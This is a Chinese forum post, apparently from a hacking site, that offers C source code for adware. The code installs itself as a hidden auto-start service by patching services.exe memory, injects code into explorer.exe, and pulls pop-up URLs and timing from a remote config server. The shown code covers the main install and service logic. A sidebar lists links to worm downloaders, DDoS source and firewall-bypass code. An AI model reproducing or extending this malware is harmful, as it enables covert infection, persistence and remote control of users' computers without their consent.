|
[推荐]一个弹窗口的流氓软件源码
这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口以及周期时间,然后开始弹……程序安装成服务,并设置为自动启动。启动之后写入一段代码到explorer.exe进程中,也就是这里在弹网页,然后将服务停止。
我写的代码没什么技术含量,唯一的是使用了我们team的zzzevazzz的隐藏服务代码,最开始他是发在ph4nt0m的核心区的。不过他已经在自己的blog写过,所以我发出来也没问题了。
这个是主函数,安装,读取配置,注入代码用的。
代码:
/**************************************************************************************************
* 1. 给XX作的流氓软件
* 2. 隐藏服务是copy的EVA的代码,修改Services.exe进程内存。
**************************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <Winsock2.h>
#include <windows.h>
#include <Tlhelp32.h>// 是否记录日志
//#define DEBUG
#ifdef DEBUG
#define DEBUG_LOG “c:\debug.txt”
// 日志记录函数
void LogToFile( WCHAR * );
#endif#include “ControlService.h”
#include “HideService.h”
#include “CustomFunction.h”#pragma comment (lib, “Advapi32.lib”)
#pragma comment (lib, “Shell32.lib”)
#pragma comment (lib, “ws2_32.lib”)
#pragma comment (lib, “User32.lib”)#define REMOTE_FUNC_LENGTH 1024 * 10 // 拷贝的长度
#define TARGET_PROCESS L”explorer.exe” // 要注入代码的目标进程
#define CONFIG_HOST “www.icylife.net” // 读取配置信息的服务器
#define CONFIG_PATH “/url.txt” // 配置信息在配置服务器的路径
#define IE_PATH “C:\Program Files\Internet Explorer\iexplore.exe”
#define DEFAULT_URL “http://www.he100.com” // 默认弹出的窗口
#define DEFAULT_SLEEP_TIME 30 * 60 * 1000 // 默认弹出窗口的间隔时间// 宏,转换字符串为unicode
#define MULTI_TO_WIDE( x, y ) MultiByteToWideChar( CP_ACP, MB_PRECOMPOSED,y,-1,x,_MAX_PATH );// 弹出窗口之间的间隔时间
int sleep_time;// 弹出的url地址
char url_path[512] = { 0 };/**************************************************************************************************
* 函数原形
**************************************************************************************************/void ServiceMain( DWORD, char **); //服务入口
BOOL SetDebugPrivilege( ); //获取debug权限
DWORD GetProcessIdByName(WCHAR * ); //获取进程的PID
void InjectCode( ); //写代码到远程进程
void GetConfig( ); //更新配置,获取要弹出的地址和弹出间隔时间/**************************************************************************************************
* 程序入口,主函数
**************************************************************************************************/
int WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
{
WCHAR filePath[MAX_PATH] = { 0 }; //程序本身路径
SERVICE_TABLE_ENTRY serviceTable[2];serviceTable[0].lpServiceName = SERVICE_NAME;
serviceTable[0].lpServiceProc = ( LPSERVICE_MAIN_FUNCTION )ServiceMain;serviceTable[1].lpServiceName = NULL;
serviceTable[1].lpServiceProc = NULL;GetModuleFileName( NULL, filePath, MAX_PATH );
// 如果服务未安装,安装
if( !ServiceExists( filePath ) )
{
if( ServiceInstall( filePath ) != TRUE )
{
return -1;
}
else
{
return 0;
}
}if( !StartServiceCtrlDispatcher( serviceTable ) )
{
#ifdef DEBUG
WCHAR tmp[256] = { 0 };
wsprintf( tmp, L”Main StartServiceCtrlDispatcher error: %d\n”, GetLastError() );
LogToFile( tmp );
#endifreturn -1;
}return 0;
}
| 黑色技术蠕虫下载者[完整源码] | 11-01 |
| 利用BCB自己打造QQ炸弹 | 10-23 |
| 从内存中加载并启动一个exe(delp | 09-27 |
| 开启和关闭Windows xp 防火墙(de | 09-27 |
| 让你的程序通过XP防火墙(delphi编 | 09-27 |
| 如何让你的程序安全通过windows防 | 08-20 |
| 如何透过程序来控制 Windows (XP | 08-20 |
| 动易2005-2006算号器的源代码 | 08-11 |
| API对注册表进行操作(Delphi编程 | 07-30 |
| 一段隐藏注册表项的代码 | 07-26 |
| 了解VB编写病毒的大体方法 | 07-02 |
| 每秒4W的DDOS源码 | 06-08 |
您现在的位置: